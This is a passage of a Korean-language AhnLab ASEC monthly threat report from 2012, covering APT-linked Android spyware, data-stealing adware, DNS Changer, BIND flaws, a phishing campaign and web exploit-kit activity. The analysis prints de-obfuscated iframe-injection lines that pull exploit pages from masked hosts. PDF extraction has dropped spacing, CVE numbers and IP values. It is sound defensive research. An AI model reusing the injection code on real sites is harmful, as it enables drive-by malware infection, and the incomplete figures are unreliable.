17 17 윈도우에서는 [ 그림 1-54] 와같은형태로발송되며, 첨부된파일을압축해제하면 word 파일을가장한 matiriyal.exe 악성코드가생성된다. 03 악성코드동향 모바일악성코드이슈 APT 공격과관련된안드로이드악성코드발견 그림 1-54 윈도우사용자타깃메일그림 1-55 첨부된파일압축해제악의적인메일로부터피해를방지하기위해아래사항들을준수하도록한다. 1. 출처가불분명하거나의심되는제목일때는메일을열지말고삭제한다. 또는발신자와제목을비교하여정상메일이아닐확률이높으면삭제한다. 2. 사용중인보안프로그램은최신버전으로업데이트하고실시간감시기능을사용한다. 3. 메일에첨부된파일은바로실행하지않고, 저장해보안프로그램으로검사한후실행한다. 4. 의심되거나확인되지않은링크는클릭하지않는다. 5. 포털사이트메일계정을이용할경우스팸메일차단기능을적극 보안업체인트렌드마이크로 (Trend Micro) 는 7월 27일 <Adding Android and Mac OS X Malware to the APT Toolbox> 라는제목의문서를공개하였다. 이문서는 2012년 3월공개한 <Luckycat Redux : Inside an APT Campaign> 에서설명한럭키캣 (Luckycat) 이라는 APT 공격형태를조사하는과정에서발견된안드로이드 (Android) 악성코드에대해다루고있다. 트렌드마이크로는럭키캣 APT 공격과관련된특정 C&C 서버를조사하는과정에서해당 C&C 서버에서안드로이드스마트폰에설치가능한 2개의 APK 파일을발견했다 (AQS.apk(15,675바이트), testservice. apk(17,810바이트 )). ASEC은위 AQS.apk(15,675바이트 ) 와 testservice.apk(17,810바이트 ) 파일들을확보하여자세한분석을진행하였다. 2개의 APK 파일은모두동일한기능을하도록제작되었으며, 그중 testservice. apk(17,810바이트 ) 를안드로이드스마트폰에설치하면 [ 그림 1-56] 의아이콘이생성된다. 그림 1-56 APT 관련안드로이드악성코드아이콘 또한이앱을사용자가직접실행시키거나, 스마트폰이사용자에의해부팅될경우이를자동으로감지하여 TService라는서비스로실행한다. 활용한다. <V3 제품군의진단명 > - Win-Trojan/Dropper.94208( ) - Win-Trojan/Agent MK( ) - Win-Trojan/Dropper ( ) 그림 1-57 Tservice 로실행되는안드로이드앱 이서비스는감염된안드로이드스마트폰에서 IMEI(International

18 18 그림 1-58 중국에위치한시스템으로접속하는코드 Mobile Equipment Identity), 스마트폰번호와저장장치의파일정보들을수집하여중국에위치한 gr******ns.3322.org:54321 해당 C&C 서버와통신을시도한다. C&C 서버와통신이성공하면 [ 그림 1-59] 와같이공격자가지정한다양한악의적인명령들을수행할수있다. [ 그림 1-60] 의앱은 Image stripper 라는앱이다. 어렸을적오락실에서하던일명 땅따먹기 게임과유사한형태의게임이다. 그러나이게임을설치하기전에요구되는퍼미션을살펴보면, 게임에필요하지않을것으로보이는위치정보, 전화상태등과도한퍼미션을요구하는것을알수있다. 또한이앱을설치하면, 주기적으로 [ 그림 1-61] 과같은알림 (Notification) 을받게된다. 그림 1-61 알림창의내용 그림 1-59 다양한악의적인기능들을수행 이러한퍼미션과알림창은해당앱에포함된 Airpush라는광고모듈때문인데, 이광고모듈의구조는 [ 그림 1-62] 와같다. 공격자는파일업로드및다운로드, 인터넷연결접속, 원격명령을수행하는리모트셸 (Remote Shell) 명령을 C&C 서버를통해내릴수있다. 이 2개의안드로이드악성코드가실제럭키캣 APT 공격에사용되었는지는명확하지않다. 그러나 APT 공격과관련된 C&C 서버에서발견되었다는사실로미루어볼때, APT 공격을수행한공격자들은안드로이드악성코드제작과유포를통해특정조직의중요정보탈취에악용하고자하였던것으로추정된다. <V3 제품군의진단명 > - Android-Trojan/Infostealer.G - Android-Trojan/Infostealer.H 스마트폰에도설치되는애드웨어 PC를사용하다보면원하지않는툴바, 아이콘등이설치되거나광고가뜨는것을누구나한번쯤은경험한적이있을것이다. 보통이러한프로그램들은애드웨어나스파이웨어로분류되며, 이는스마트폰역시예외가아니다. 특히, 스마트폰은이러한애드웨어로인해사용자들의위치정보, 기기정보등의개인정보가유출될위험이있으므로주의해야한다. 실제최근발견된애드웨어앱을통해해당내용을자세히살펴보도록하자. 1 Image Stripper 그림 1-62 게임앱속에포함된 airpush.android 패키지 Airpush 모듈은위와같은구조로되어있으며, 앱실행시에 PushService 클래스가동작한다. 이 PushService는서비스를상속받은클래스로, 사용자에게지속적으로광고를강요한다. 그림 1-63 사용자정보저장 [ 그림 1-63] 에서볼수있듯이, 사용자의정보일부를 Base64로인코딩하여저장하며, 저장된정보를이용해사용자들을구별하여광고를강요한다. 이앱은지속적인푸시알림을통한광고로사용자를귀찮게한다. 결국이앱은사용자가원하지않는동작을하기때문에 V3 제품에서는애드웨어로분류되고있으며, 아래와같이진단한다. <V3 제품군의진단명 > - Android-PUP/Airpush.HEX 그림 1-60 앱실행화면및퍼미션

19 19 2 Funny cartoon [ 그림 1-66] 을보면사용자가방문한사이트, 날짜, URL 등을탈취해가는코드를, [ 그림 1-67] 에서는사용자디바이스정보, 전화번호, Mac 어드레스정보등사용자정보를탈취하는코드를확인할수있다. 그림 1-64 앱실행화면및퍼미션 [ 그림 1-64] 는 Funny cartoon 이라는앱으로여러가지벨소리를설정할수있는앱이다. 그러나설치과정에서과도한퍼미션을요구하며, 해당앱을디컴파일해보면이앱역시광고모듈을포함하고있는것을확인할수있다. 그림 1-67 사용자정보이 apperhand 모듈은광고의목적이외에사용자들의정보를동의없이가져가기때문에 V3 제품에서애드웨어가아닌트로이목마로진단한다. <V3 제품군의진단명 > - Android-Trojan/Plankton.HD 그림 1-65 포함된광고모듈디컴파일시, 위와같이 airpush 광고모듈이외에도 apperhand, mobfox라는광고모듈이포함된것을확인할수있다. 여기서자세히살펴봐야할것은 apperhand라는광고모듈이며, 이모듈은 [ 그림 1-66] 과같다. 그림 1-66 사용자의 Bookmark 정보

20 SECURITY TREND 보안동향 보안통계 7 월마이크로소프트보안업데이트현황 2012 년 7 월마이크로소프트사에서발표한보안업데이트는긴급 3 건, 중요 6 건으로, 특히 XML Core Services 취약점 (CVE ) 을 해결하는보안패치 (MS ) 가포함됐다. 최근악성코드배포목 적으로해당취약점이많이이용되고있으므로반드시보안패치를적 용할것을권고한다. 자세한내용은 <ASEC 보안위협동향리포트 2012 Vol.30> 에서추가로확인할수있다. 긴급 MS Microsoft XML Core Services 의취약점으로인한원격코드실행문제점 MS Internet Explorer 누적보안업데이트 MS Microsoft Data Access Components 의취약점으로인한원격코드실행문제점 중요 MS Visual Basic for Applications의취약점으로인한원격코드실행문제점 MS Windows 커널모드드라이버의취약점으로인한권한상승문제점 MS Windows 셸의취약점으로인한원격코드실행문제점 MS TLS 의취약점으로인한정보유출문제점 MS SharePoint의취약점으로인한권한상승문제점 MS Microsoft Office for Mac의취약점으로인한권한상승문제점 표 년 7 월주요 MS 보안업데이트 그림 2-1 공격대상기준별 MS 보안업데이트 ( )

21 SECURITY TREND 보안동향 보안이슈 DNS changer 감염으로인한인터넷접속장애주의 DNS Changer 악성코드의특징은감염된시스템의 DNS 서버 IP를제작자가의도한 IP 주소로변경하는것이다. DNS 서버의 IP를변경하는방식은 DNS Changer 이외에도다른여러악성코드들이나파밍과같은사기수법등다양한형태의공격방식에서사용되고있다. DNS Changer 악성코드를비롯해이방식을사용하는악성코드는, 웹브라우저를이용해정상사이트에접속을시도할때제작자가의도한악성코드를감염시키는페이지로접속하도록조작하여 2차감염의피해를유발한다. 특히 DNS Changer 악성코드는제작자가감염된시스템을좀비 PC로만들어다양한용도로사용하기위해제작됐기때문에감염된시스템은 PC 사용자정보의유출뿐아니라다른시스템을공격하는등여러가지문제를유발했을가능성이높다. 이러한악성코드의경우해당악성코드를제거하더라도사용자가 DNS의 IP가변경된것을인지하지못하면이로인해다시감염될가능성이짙기때문에지속적인피해를당할수있다. DNS Changer Working Group( 의자료에의하면이악성코드에감염된시스템은대부분미국과유럽에위치하고있으며, 약 30만 ~40만대의시스템이현재감염된것으로추정된다. 그림 2-2 DNS Changer 감염현황감염된피해시스템현황에대한정보는 DCWG에서제공하는감염된시스템의 Unique IP로추정해볼수있다. * DNS Changer 감염 Unique IP 현황 다만감염된시스템들이모두켜져있는것은아니므로이수치는대략적인것이며실제로는더많은시스템들이감염된것으로보인다. 다행스러운것은현재는해당악성코드의제작자가검거되었기때문에봇넷이더는동작하지않을가능성이높다는것이다. 그러나해당악성코드의변형이매우많고다양한기능들이아직동작하고있으므로여전히해당악성코드로인한피해의가능성은남아있다. 그중가장큰문제가되는것이변경된 DNS 서버주소로인한피해이다. FBI에서는악성코드제작자가운영하던 DNS 서버를 7월 9일정지시킬예정인데, 해당악성코드에의해 DNS 서버의주소가변경된경우 DNS 서버가동작하지않으므로도메인을이용한웹사이트접속등의통신이불가능하게된다. 개인 PC뿐아니라도메인을이용해서버간통신을하는경우에도 DNS 서버를사용할수없게되므로대상서버의 IP 주소를찾지못해서비스에장애가발생할가능성이있다. 특히웹서버같은도메인을많이사용하는시스템들은주의가필요하다. 정부는국내에서 DNS Changer의감염수치가미미한수준이므로해당악성코드에의한피해가크지는않을것이라고발표했다. DCWG에서도국내의감염피해가크지않은것으로보고있지만, 장애예방차원의점검을할필요는있다. 가장큰문제가우려되는통신장애에대비하여자신이사용하고있는시스템의감염여부를확인하기위해서는 DNS 서버의주소가아래의악성서버로변경되어있는지확인해야한다. DNS Changer의악성 DNS 서버목록시작 IP 마지막 IP CIDR / / / / / /20 표 2-2 DNS Changer가운영하는악성 DNS 목록

22 SECURITY TREND 22 기업사용자는내부서버들의네트워크설정정보를점검하는것을권하나, 만약환경이적절하지않다면, 위의주소로 DNS 쿼리등통신을하는시스템이있는지방화벽등네트워크장비를모니터링해보는것을권장한다. 개인사용자는아래사이트에접속을하는것만으로도 [ 표 2-2] 에기재된 DNS 서버의사용여부를확인하는것이가능하므로접속해볼것을권장한다. * DNS Changer 감염여부점검하기 그림 2-3 DNS Changer 감염여부체크하기또한보호나라에서 DNS Changer와관련된발표자료를참고하면피해예방에도움이될수있다. * 보호나라의 DNS Changer 정보보기 sequence=960 * 보호나라에서제공하는 DNS Changer 전용백신 id=vac 에서이 BIND를이용하여 DNS 서비스를운영하고있다. 대중적인버전인 BIND 9에서취약점 2개가보고되었다. 1 CVE : High TCP Query Load Can Trigger a Memory Leak in BIND 9 2 CVE : Heavy DNSSEC Validation Load Can Cause a "Bad Cache" Assertion Failure in BIND9 CVE 은 BIND 9.9.0부터 P1에해당하며대량의 TCP 쿼리가들어오면메모리 Leak이발생하여쿼리응답성능을크게감소시킨다. 서비스를운영하는입장에서는큰문제이며, 지속적인메모리 Leak은시스템전반적으로메모리부족을가져와시스템다운을가져올수도있다. 이번취약점은 BIND9에서 Incoming 쿼리트랙에사용되는구조체인 ns_client에의해서발생하는것으로, 큐를비우는과정에서 Race Condition 버그가존재한다. BIND P2로업데이트하면문제가해결된다. CVE 은조금더다양한버전에서문제가발생한다. 해당버전은다음과같다 ESV-R1 through 9.6-ESV-R7-P1; through P1; through P1; through P1 DNSSEC 기능을사용하지않으면이번취약점에는영향을받지않는다. DNSSEC validation을사용하는경우대량의쿼리가네임서버에잘못된캐쉬를삽입할수있다. 이취약점은 BIND 9.4, 9.5에서도같은영향을미칠것으로예상된다. 하지만해당버전은더이상지원을하지않기때문에공식적인버전에는포함돼있지않다. 오래된버전도영향을주는것으로판단되는만큼업그레이드가필요하다. BIND를이용하여 DNS 서비스를운영하는경우에는해당취약점을해결한버전을사용할것을권고한다. 마지막으로악성코드에대한이해를돕기위해미국 FBI에서발표한내용을참고할수있다. DNS-changer-malware.pdf DNS Changer에도다양한변형이존재하며감염시여러악성코드들을설치하기때문에감염이의심된다면위의내용을참고하여 DNS 주소를체크하고전용백신을이용해검사할것을권장한다. 다만해당악성코드의경우 5년가까운오랜기간동안변형이유포되었기때문에전용백신에도진단되지않는변형이있을가능성이있다. 따라서사용하고있는백신이있다면최신엔진으로업데이트후추가로검사를해보는것이좋다. BIND 9 취약점발견및업데이트권고 어느기업의데이터유출후, 고객에게보내진 보안패치 메일의비밀 특정기업에서데이터가유출된후, 해당데이터를통해고객에게조작된메일이보내졌다. 그리고그조작된메일을통해사용자가악성코드에감염되는사건이발생했다. 이는메이플소프트 (Maplesoft) 라는수학, 분석용소프트웨어를개발하는곳에서실제발생했던것으로 7월 17일관리용데이터베이스에서고객정보 ( 이메일주소, 이름, 회사및기관정보 ) 가유출됐다. 공격자는획득한정보를이용하여고객에게 MapleSoft Security Update Team 에서보낸것같이조작된메일을전송했다. 메이플제품에서취약점이발견됐으니관련패치를설치하라는메일로, 내용은 [ 그림 2-4] 와같다. BIND 는 DNS 서버로많이이용되는소프트웨어이다. 많은 ISP 및기관

23 SECURITY TREND 23 그림 2-4 공격자가발송한메이플취약점보안패치이메일출처 : University of Michigan 피싱경고안내문 실제메이플소프트사에서보낸것으로위장하기위해메일에유출된고객의이름을사용하였고, 유사한도메인인 maple-soft.com 을 7월 17일에등록했다. 사용자가링크를클릭하면 CVE 취약점을이용하여사용자시스템에 2개의악성코드를드랍한다. 이를요약하면다음과같다 : 1. 사용자정보획득 + 유사한도메인이름등록 2. 제품패치를유도하는조작된메일을고객에게전송 3. 사용자는이메일에포함된링크를통해공격사이트에방문하여악성코드에감염됨유출된정보가 2차적인피해로이어졌다는접에서시사하는바가크다. 기업들은고객의개인정보를안전하게보관하기위하여더욱노력해야할것이다.

24 WEB SECURITY TREND 웹보안동향 웹보안통계 웹사이트악성코드동향안랩의웹브라우저보안서비스인사이트가드 (SiteGuard) 를활용한웹사이트보안통계자료에의하면, 2012년 7월악성코드를배포하는웹사이트를차단한건수는총 7940건이었다. 악성코드유형은총 398종, 악성코드가발견된도메인은 211개, 악성코드가발견된 URL은 831개였다. 이는 2012년 6월과비교할때전반적으로감소하였으나, 악성코드가발견된 URL은증가한수치이다. 악성코드배포 URL 차단건수 9,850 7, % 악성코드유형악성코드가발견된도메인악성코드가발견된 URL Graph 표 년 7 월웹사이트보안현황 월별악성코드배포 URL 차단건수 2012년 7월악성코드배포웹사이트 URL 접근에대한차단건수 15,000 10,000 12, % -2,877 9, % 7, % -1,910 는지난달 9850건에비해 20% 감소한 7940건이었다. 5, 그림 3-1 월별악성코드배포 URL 차단건수변화추이

25 WEB SECURITY TREND 25 월별악성코드유형 2012년 7월의악성코드유형은전달의 409건에비해 3% 줄어 % % 2.7% -11 든 398 건이었다 그림 3-2 월별악성코드유형수변화추이 월별악성코드가발견된도메인 2012년 7월악성코드가발견된도메인은 211건으로 2012년 6 월의 241건에비해 12% 감소했 % % 12.4% -30 다 그림 3-3 월별악성코드가발견된도메인수변화추이 월별악성코드가발견된 URL 3, 년 7월악성코드가발견된 URL은전월의 792건에비해 5% 증가한 831건이었다. 2,000 1,000 1, % % 4.9% 그림 3-4 월별악성코드가발견된 URL 수변화추이

26 WEB SECURITY TREND 26 악성코드유형별배포수악성코드유형별배포수를보면트로이목마가 3765 건 /47.4% 로가장많았고, 드롭퍼가 1105/13.9% 인것으로조사됐다. 유형 건수 비율 TROJAN 3, % DROPPER 1, % ADWARE % DOWNLOADER % APPCARE % Win32/VIRUT % JOKE % SPYWARE % ETC 1, % TOTAL 7, % 표 3-2 악성코드유형별배포수 TROJAN 3,765 5,000 ETC 1,619 2,500 DROPPER 1,105 ADWARE 541 DOWNLOADER 504 APPCARE 327 Win32/VIRUT 45 JOKE 22 SPYWARE 12 0 그림 3-5 악성코드유형별배포수 악성코드최다배포수악성코드배포최다 10건중에서 Trojan/Win32.Agent가 883 건으로가장많았고 Trojan/ Win32.Agent등 5건이새로등장하였다. 순위 등락 악성코드명 건수 비율 1 NEW Trojan/Win32.Agent % 2 NEW Dropper/Win32.Banki % 3 NEW Trojan/Win32.ADH % 4 5 Trojan/Win32.SendMail % 5 1 Downloader/Win32.Korad % 6 2 Trojan/Win32.HDC % 7 ALS/Bursted % 8 3 ALS/Qfas % 9 NEW Win-Adware/Shortcut.INBEE.sungindang % 10 NEW Dropper/Win32.Mudrop % TOTAL 3, % 표 3-3 악성코드대표진단명최다 20 건

27 WEB SECURITY TREND 웹보안동향 웹보안이슈 2012 년 7 월침해사이트현황 서중복여부를비교해보았다. 그결과상당수의사이트가동일하였고중복된사이트들중에는언론사사이트가대다수였고해당사이트들을통해서유포되었던악성스크립트와트로이목마의구조는전월동향에서살펴보았던것과같다. GongDa Pack 의스크립트악성코드증가 그림 년월별침해사이트현황 [ 그림 3-6] 은악성코드유포를목적으로하는침해사고가발생했던사이트들의월별현황으로, 7월은 6월에비해소폭하락했다. 침해사이트를통해서유포된악성코드최다 10건 [ 표 3-4] 는 7월한달동안가장많은사이트를통해서유포되었던악성코드최다 20건이다. 1위를차지한 Win-Trojan/Agent GN( 이하 Agent GN) 는 20개의국내사이트를통해유포되었다. ASEC은 2012년 5월월간 < 안 > 을통해공다팩 (GongDa Pack) 으로명명된중국에서제작된웹익스플로잇툴킷 (Web Exploit Toolkit) 에대한상세한분석정보에대해설명했다. < 'GongDa' 의무차별웹공격이시작됐다 > 공다팩이라는해당웹익스플로잇툴킷의스크립트악성코드는다양한일반애플리케이션들의취약점을악용하여온라인게임관련개인정보들을탈취하는악성코드유포가목적이다. 이러한공다팩에서사용되는스크립트악성코드가최근몇주사이지속적으로발견되고있으며, 업데이트된공다팩변형에의해유포되는것으로확인되었다. 2012년 5월에처음발견된공다팩에서사용되는스크립트악성코드는버전이 JSXX 0.41 로표기됐으나, 최근에다시발견되고있는스크립트악성코드들은 [ 그림 3-7] 처럼 JSXX 0.44 로표기되어있다. 순위악성코드명건수 1 Win-Trojan/Agent GN 20 2 Win-Trojan/Onlinegamehack G 19 3 Dropper/Onlinegamehack C 19 4 Dropper/Win32.OnlineGameHack 18 5 Win-Trojan/Onlinegamehack X 18 6 Win-Trojan/Onlinegamehack135.Gen 18 7 Win-Trojan/Onlinegamehack H 17 8 Dropper/Onlinegamehack B 17 9 Win-Trojan/Onlinegamehack Z Trojan/Win32.OnlineGameHack 17 표 3-4 침해사이트를통해서유포된악성코드최다 10건 1위인 Agent GN이유포되었던 20개의사이트와전월에 1위였 던 Trojan/Win32.OnlineGameHack가유포되었던 24개의사이트에대해 그림 3-7 공다팩에악용되는스크립트파일공다팩과같은웹익스플로잇툴킷들은어도비플래시나자바와같은일반애플리케이션들의취약점을악용하여다른악성코드들의감염을시도한다는점이특징이다. 그러므로, 운영체계를포함해자주사용하는애플리케이션들의취약점을제거할수있는보안패치들을주기적으로

28 WEB SECURITY TREND 28 설치하는것이중요하다. <V3 제품군의진단명 > - HTML/Downloader 그림 3-10 ******s.html 에존재하는실행파일 <TrusGuard 진단명 > - pack_malicious_gongda(http) - pack_malicious_gongda-2(http) 해킹된동영상사이트를통한악성코드유포국내사이트를모니터링하는과정에서해킹된동영상사이트로부터악성코드가유포된것이발견되었다. 악성코드유포는취약한사이트를해킹한후해당웹페이지에악성링크를삽입하는것으로부터시작되며공격자들은대부분코드를난독화하고자동화툴을사용한다. 하지만, 공격자가난독화시키는스크립트패턴이대부분유사하기때문에주의를기울이면페이지에삽입된악성링크를쉽게찾아서제거할수있다. 공격자들은삽입된스크립트를쉽게찾지못하도록정상코드인것처럼보이는패턴을삽입한다. [ 그림 3-8] 은해킹된동영상사이트의 jquery.min.js 파일에삽입된악성링크의난독화된코드이다. 그림 3-8 난독화된악성링크 [ 그림 3-8] 을보면삽입된악성링크는 function jquerymain(a) 부분부터시작하는데, 악성유무를구분하기어렵도록 jquery.min.js의파일명과유사한함수명을사용한다. Function(jqueryMain()) 에는탭과스페이스키를사용하여빈공간처럼위장한악성링크의메인코드가존재한다. 그림 3-9 탭과스페이스키로구성된메인코드 [ 그림 3-9] 의난독화된코드를풀면아래처럼특정 URL에서 ******s.html 을다운로드하도록되어있는것을알수있다. 2) document.write('<iframe frameborder=0 src= com/home/join/*******f.html width=100 height=1 scrolling=no></ iframe>'); *******f.html는 CVE 취약점을사용하여 zoad.gif를다운로드후실행한다. zoad.gif는 ws2help.dll을교체하는온라인게임핵악성코드이다. 그림 3-11 *******f.html에존재하는 Shellcode <V3 제품군의진단명 > - Win-Trojan/Small.57536( 진단버전 : ) - Win-Trojan/Onlinegamehack ( 진단버전 : ) - Trojan/Win32.AVKiller( 진단버전 : ) - Win-Trojan/Onlinegamehack.42669( 진단버전 : ) XML 코어서비스취약점악용으로온라인게임악성코드유포 ASEC은 6월 26일마이크로소프트 (Microsoft) 의 XML 코어서비스취약점 (CVE ) 을악용한공격형태가증가하고있다고안내한바있다. 그리고 6월 28에는해당공격이변형된형태로취약한웹사이트를중심으로유포되고있다고전했다. 그리고다시제로데이 (Zero-Day, 0-Day) 취약점이었던 XML 코어서비스취약점악용형태가 6월 30일과 7월 1일이틀사이국내의취약한웹사이트들을대상으로유포되고있는것이발견되었다. 해당스크립트악성코드는아래이미지와같은형태이며, 이제까지발견된것과는다르게난독화정도가심하다. 1) document.write('<'+'i'+'f'+'ra'+'m'+'e'+' frameborder=0 src= g*******ox.com/home/join/******s.html width=100 height=1 scrolling=n o></'+'i'+'f'+'ra'+'m'+'e>'); 다운로드된 ******s.html은 CVE 취약점을사용하며파일내부에최종적으로실행할악성코드가 Hex 문자열로존재한다. 그림 3-12 XML 코어서비스취약점악용스크립트

29 WEB SECURITY TREND 29 이악성코드는최소 36개이상의온라인게임정보를탈취하기위한악성코드변형들을유포하기위해제작되었다. 해당악성코드의제작자들은 [ 그림 3-13] 과같은툴을이용하여자신들이제작한악성코드들이정상적으로유포중인지확인하고있었다. 그림 3-13 악성코드유포현황검증툴 이툴은악성코드제작자들이악성코드유포를위해해킹한시스템의도메인주소들을입력해검색하면 [ 그림 3-13] 과같이 3회에걸쳐파일이정상적으로존재하는지그리고유포가가능한지확인할수있다. 이러한툴이제작되어사용되고있다는것으로미루어악성코드제작자들은실시간으로유포중인악성코드들의상태를확인하고, 하나의유포경로가차단되었을경우다른유포지를가동시키기위한전략의자동화를위해제작한것으로판단된다. <V3 제품군의진단명 > - JS/Agent - Win-Trojan/Hupe.Gen - Dropper/Hupe.Gen - Win-Trojan/Onlinegamehack( 변형들 ) - Win-Trojan/Agent( 변형들 ) <TrusGuard 탐지명 > - http_obfuscated_javascript_fromcharcode

30 ASEC REPORT CONTRIBUTORS 집필진 책임연구원 정관진 선임연구원 안창용 선임연구원 이도현 선임연구원 장영준 주임연구원 문영조 연구원 강민철 연구원 김재홍 참여연구원 ASEC 연구원 SiteGuard 연구원 편집장선임연구원안형봉 편집인 안랩세일즈마케팅팀 디자인 안랩 UX 디자인팀 감수전무조시행 발행처 주식회사안랩경기도성남시분당구삼평동 673 ( 경기도성남시분당구판교역로 220) T F Disclosure to or reproduction for others without the specific written authorization of AhnLab is prohibited. Copyright (c) AhnLab, Inc. All rights reserved.